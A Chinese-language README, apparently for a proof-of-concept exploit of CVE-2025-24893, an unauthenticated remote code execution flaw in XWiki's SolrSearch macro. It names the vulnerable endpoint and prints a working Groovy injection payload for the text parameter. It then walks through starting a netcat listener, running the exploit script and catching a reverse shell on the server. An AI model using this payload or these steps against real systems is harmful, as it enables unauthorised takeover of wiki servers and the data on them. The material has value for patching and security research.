
CVE-2025-24893 是 XWiki(版本 < 15.10.11、16.4.1、16.5.0RC1)中的一个严重的未认证远程代码执行漏洞,由 SolrSearch 宏中 Groovy 表达式处理不当所致。
⚠️ XWiki 中的未认证远程代码执行
🛠️ PoC 实现者:@dollarboysushil
CVE-2025-24893 是 XWiki 中的一个严重 RCE 漏洞,由 SolrSearch 宏中的不安全 Groovy 表达式处理导致。攻击者可通过构造的 GET 请求注入 Groovy 代码,从而实现远程代码执行(无需认证)。
该漏洞位于 XWiki 的 SolrSearch 宏(Main.SolrSearch)中,该宏使用不安全的 Groovy 求值来处理搜索输入。该宏未能对用户提供的输入进行净化,从而导致任意代码执行。
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
攻击者可以向 text 参数注入 Groovy 代码,由于宏系统内的输入处理不当,该参数会在服务器端被求值。
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}
这会导致在易受攻击的 XWiki 实例上实现未认证的远程代码执行(RCE)。
易受攻击的目标是运行版本 15.10.8 的 XWiki 实例,该版本受 CVE-2025-24893 影响。

在攻击者的机器上启动一个 Netcat 监听器,以捕获反向 shell 连接:
nc -lvnp 1337

运行漏洞利用脚本 CVE-2025-24893-dbs.py,向易受攻击的 XWiki 端点发送基于 Groovy 的 RCE 载荷。

成功执行后,反向 shell 将连接回监听器,使攻击者获得对服务器的远程访问权限。
